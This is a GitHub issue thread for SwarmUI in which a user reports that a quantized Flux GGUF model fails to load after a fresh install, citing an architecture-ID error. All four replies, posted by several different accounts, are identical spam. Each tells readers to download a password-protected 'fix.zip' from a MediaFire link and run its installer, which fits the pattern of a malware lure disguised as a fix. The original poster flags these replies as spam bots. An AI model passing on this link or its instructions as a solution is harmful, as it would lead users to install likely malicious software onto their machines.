### ISSUE TITLE
Fresh Install - Quantized Flux failed to load

### ISSUE THREAD

**Issue by mr-september** [mcmonkeyprojects/SwarmUI#212]
### Your question

I just installed SwarmUI for the first time. During install, I chose to not download any models (neither SDXL nor the full FLUX), because I have already prepared a Q6 quantized version, and didn't want to waste time downloading the full Flux for nothing.

I put the Quantized Flux in `models/unet`, ae.safetensor in `models/VAE`, and both clip and t5 encoder in `models/clip`.

On first run, SwarmUI prompted something about noticing the quantized version and installing something from city63 or something, which I agreed to.

I then restarted SwarmUI.

It still does not generate anything, both in Simple and Generate.

Load model --> "Model failed to load."

Generate --> "All available backends failed to load the model."

I notice the cmd prompt says something about "Model loader for flux1-dev-Q6_K.gguf didn't work - are you sure it has an architecture ID set properly?"

But there's absolutely 0 google results for `swarmui "architecture ID set properly"`.

Could someone please let me know what I'm missing or doing wrong?

# Ignore the spam bot replies below

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
